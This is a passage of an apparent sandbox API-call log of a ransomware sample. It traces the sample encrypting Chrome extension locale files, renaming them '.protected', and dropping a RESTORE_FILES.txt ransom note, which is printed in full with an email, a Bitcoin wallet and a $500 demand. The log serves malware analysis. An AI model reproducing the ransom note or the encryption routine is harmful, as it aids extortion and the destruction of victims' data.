lpOverlapped=0x0) returned 1 [0080.418] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.418] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.418] CloseHandle (hObject=0x164) returned 1 [0080.418] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0080.418] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US") returned 144 [0080.418] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0080.419] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0080.419] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*") returned 146 [0080.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0080.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\.") returned 146 [0080.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.420] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\..") returned 147 [0080.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.421] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0080.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.423] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0080.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.423] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.423] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.424] CloseHandle (hObject=0x168) returned 1 [0080.424] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.protected") returned 168 [0080.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0080.425] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.425] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.425] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0080.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 
[0080.426] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.426] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.427] lstrlenA (lpString="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") returned 684 [0080.427] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0080.427] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.427] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.427] CloseHandle (hObject=0x164) returned 1 [0080.427] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.427] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0080.427] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0080.427] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0080.427] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0080.427] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0080.427] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es") returned 141 [0080.427] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0080.427] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0080.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*") returned 143 [0080.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 
[0080.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.428] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\.") returned 143 [0080.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.428] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.428] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\..") returned 144 [0080.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.428] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="Program Files 
(x86)") returned -1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.429] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.429] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.430] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xcc, lpOverlapped=0x0) returned 1 [0080.431] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.431] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xcc, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xcc, lpOverlapped=0x0) returned 1 [0080.431] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.431] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.431] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.431] CloseHandle (hObject=0x168) returned 1 [0080.431] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.protected") returned 165 [0080.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.protected")) returned 1 [0080.432] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.432] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.432] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\RESTORE_FILES.txt") returned 159 [0080.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.433] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.433] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.434] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.434] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.434] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.434] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.434] CloseHandle (hObject=0x164) returned 1 [0080.434] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0080.434] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 
